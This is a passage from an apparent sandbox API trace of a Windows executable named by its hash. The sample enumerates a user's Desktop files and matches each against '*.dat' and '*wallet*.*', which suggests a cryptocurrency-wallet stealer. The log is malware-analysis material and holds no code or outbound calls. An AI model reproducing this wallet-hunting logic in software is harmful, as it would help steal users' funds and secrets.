cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.766] PathMatchSpecW (pszFile="_aNuOe6kDQsgIz0qDq.ods", pszSpec="*.dat") returned 0 [0110.766] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadff6a0, ftCreationTime.dwHighDateTime=0x1d7ab67, ftLastAccessTime.dwLowDateTime=0x51082c40, ftLastAccessTime.dwHighDateTime=0x1d7ad09, ftLastWriteTime.dwLowDateTime=0x51082c40, ftLastWriteTime.dwHighDateTime=0x1d7ad09, nFileSizeHigh=0x0, nFileSizeLow=0xe3d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aNuOe6kDQsgIz0qDq.ods", cAlternateFileName="_ANUOE~1.ODS")) returned 0 [0110.766] FindClose (in: hFindFile=0x7437e0 | out: hFindFile=0x7437e0) returned 1 [0110.766] GetLastError () returned 0x12 [0110.766] SetLastError (dwErrCode=0x12) [0110.766] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0110.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970510, cbMultiByte=31, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0110.766] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2c00 [0110.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970510, cbMultiByte=31, lpWideCharStr=0x29a2c00, cchWideChar=31 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned 31 [0110.766] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ae0 [0110.766] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c00 | out: hHeap=0x29a0000) returned 1 [0110.766] lstrcpyW (in: lpString1=0x19d240, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.766] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*" [0110.766] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*", lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7436e0 [0110.767] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.767] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.767] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\." [0110.767] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.767] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.767] lstrcatW (in: lpString1="\\", lpString2="." | out: lpString1="\\.") returned="\\." [0110.767] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.767] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.767] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.767] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.767] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\.." [0110.767] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.767] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.767] lstrcatW (in: lpString1="\\", lpString2=".." | out: lpString1="\\..") returned="\\.." [0110.767] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.767] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.767] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf546ee50, ftCreationTime.dwHighDateTime=0x1d7a7b3, ftLastAccessTime.dwLowDateTime=0x13efdd40, ftLastAccessTime.dwHighDateTime=0x1d7aa88, ftLastWriteTime.dwLowDateTime=0x13efdd40, ftLastWriteTime.dwHighDateTime=0x1d7aa88, nFileSizeHigh=0x0, nFileSizeLow=0x1883f, dwReserved0=0x0, dwReserved1=0x0, cFileName="0zAI6IIW3Y-.jpg", cAlternateFileName="0ZAI6I~1.JPG")) returned 1 [0110.767] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.767] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.767] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="0zAI6IIW3Y-.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg" [0110.768] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.768] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.768] lstrcatW (in: lpString1="\\", lpString2="0zAI6IIW3Y-.jpg" | out: lpString1="\\0zAI6IIW3Y-.jpg") returned="\\0zAI6IIW3Y-.jpg" [0110.768] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0110.785] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2f) returned 0x39700d0 [0110.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", cchWideChar=47, lpMultiByteStr=0x39700d0, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", lpUsedDefaultChar=0x0) returned 47 [0110.785] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.785] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.785] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.785] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970f20 [0110.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970f20, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.785] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970470 [0110.785] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f20 | out: hHeap=0x29a0000) returned 1 [0110.786] PathMatchSpecW (pszFile="0zAI6IIW3Y-.jpg", pszSpec="*wallet*.*") returned 0 [0110.786] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970470 | out: hHeap=0x29a0000) returned 1 [0110.786] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.786] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf25bae10, ftCreationTime.dwHighDateTime=0x1d7a2f9, ftLastAccessTime.dwLowDateTime=0xa41e8ef0, ftLastAccessTime.dwHighDateTime=0x1d7a774, ftLastWriteTime.dwLowDateTime=0xa41e8ef0, ftLastWriteTime.dwHighDateTime=0x1d7a774, nFileSizeHigh=0x0, nFileSizeLow=0x2f95, dwReserved0=0x0, dwReserved1=0x0, cFileName="31NPwfpy_GlRh15.m4a", cAlternateFileName="31NPWF~1.M4A")) returned 1 [0110.786] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.786] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.787] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="31NPwfpy_GlRh15.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a" [0110.787] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.787] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.787] lstrcatW (in: lpString1="\\", lpString2="31NPwfpy_GlRh15.m4a" | out: lpString1="\\31NPwfpy_GlRh15.m4a") returned="\\31NPwfpy_GlRh15.m4a" [0110.787] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.787] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x38ea618 [0110.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", cchWideChar=51, lpMultiByteStr=0x38ea618, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", lpUsedDefaultChar=0x0) returned 51 [0110.787] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a28e8 [0110.787] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea618 | out: hHeap=0x29a0000) returned 1 [0110.787] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.787] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970e60 [0110.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970e60, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.787] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970470 [0110.787] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e60 | out: hHeap=0x29a0000) returned 1 [0110.788] PathMatchSpecW (pszFile="31NPwfpy_GlRh15.m4a", pszSpec="*wallet*.*") returned 0 [0110.788] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970470 | out: hHeap=0x29a0000) returned 1 [0110.788] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a28e8 | out: hHeap=0x29a0000) returned 1 [0110.788] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b968de0, ftCreationTime.dwHighDateTime=0x1d7ad67, ftLastAccessTime.dwLowDateTime=0x691a0d20, ftLastAccessTime.dwHighDateTime=0x1d7aea9, ftLastWriteTime.dwLowDateTime=0x691a0d20, ftLastWriteTime.dwHighDateTime=0x1d7aea9, nFileSizeHigh=0x0, nFileSizeLow=0x139fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="38ZOxe4ZNObW5Sq.pdf", cAlternateFileName="38ZOXE~1.PDF")) returned 1 [0110.788] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.788] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.788] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="38ZOxe4ZNObW5Sq.pdf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf" [0110.788] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.788] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.788] lstrcatW (in: lpString1="\\", lpString2="38ZOxe4ZNObW5Sq.pdf" | out: lpString1="\\38ZOxe4ZNObW5Sq.pdf") returned="\\38ZOxe4ZNObW5Sq.pdf" [0110.788] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.788] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x38ea458 [0110.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", cchWideChar=51, lpMultiByteStr=0x38ea458, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", lpUsedDefaultChar=0x0) returned 51 [0110.788] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c00 [0110.788] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea458 | out: hHeap=0x29a0000) returned 1 [0110.788] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.788] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c20 [0110.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970c20, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.788] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706a0 [0110.788] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c20 | out: hHeap=0x29a0000) returned 1 [0110.788] PathMatchSpecW (pszFile="38ZOxe4ZNObW5Sq.pdf", pszSpec="*wallet*.*") returned 0 [0110.788] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706a0 | out: hHeap=0x29a0000) returned 1 [0110.788] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c00 | out: hHeap=0x29a0000) returned 1 [0110.788] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28cd69a0, ftCreationTime.dwHighDateTime=0x1d7a3ce, ftLastAccessTime.dwLowDateTime=0xe9831490, ftLastAccessTime.dwHighDateTime=0x1d7aee3, ftLastWriteTime.dwLowDateTime=0xe9831490, ftLastWriteTime.dwHighDateTime=0x1d7aee3, nFileSizeHigh=0x0, nFileSizeLow=0x895d, dwReserved0=0x0, dwReserved1=0x0, cFileName="7eG9d7.mp4", cAlternateFileName="")) returned 1 [0110.788] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.788] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.788] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="7eG9d7.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4" [0110.789] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.789] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.789] lstrcatW (in: lpString1="\\", lpString2="7eG9d7.mp4" | out: lpString1="\\7eG9d7.mp4") returned="\\7eG9d7.mp4" [0110.789] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.789] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2a) returned 0x39700d0 [0110.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", cchWideChar=42, lpMultiByteStr=0x39700d0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", lpUsedDefaultChar=0x0) returned 42 [0110.789] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.789] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.789] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.789] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c00 [0110.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970c00, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.789] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.789] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c00 | out: hHeap=0x29a0000) returned 1 [0110.789] PathMatchSpecW (pszFile="7eG9d7.mp4", pszSpec="*wallet*.*") returned 0 [0110.789] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.789] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.789] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.789] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.789] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.789] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini" [0110.789] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.789] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.789] lstrcatW (in: lpString1="\\", lpString2="desktop.ini" | out: lpString1="\\desktop.ini") returned="\\desktop.ini" [0110.789] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0110.789] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2b) returned 0x39700d0 [0110.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", cchWideChar=43, lpMultiByteStr=0x39700d0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", lpUsedDefaultChar=0x0) returned 43 [0110.790] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.790] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.790] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.790] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ee0 [0110.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970ee0, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.790] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704e8 [0110.790] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ee0 | out: hHeap=0x29a0000) returned 1 [0110.790] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*wallet*.*") returned 0 [0110.790] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704e8 | out: hHeap=0x29a0000) returned 1 [0110.790] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.790] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefda3e80, ftCreationTime.dwHighDateTime=0x1d7b3bc, ftLastAccessTime.dwLowDateTime=0xefda3e80, ftLastAccessTime.dwHighDateTime=0x1d7b3bc, ftLastWriteTime.dwLowDateTime=0x29567e00, ftLastWriteTime.dwHighDateTime=0x1d7b3ac, nFileSizeHigh=0x0, nFileSizeLow=0x192800, dwReserved0=0x0, dwReserved1=0x0, cFileName="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cAlternateFileName="F811CF~1.EXE")) returned 1 [0110.790] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.790] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: 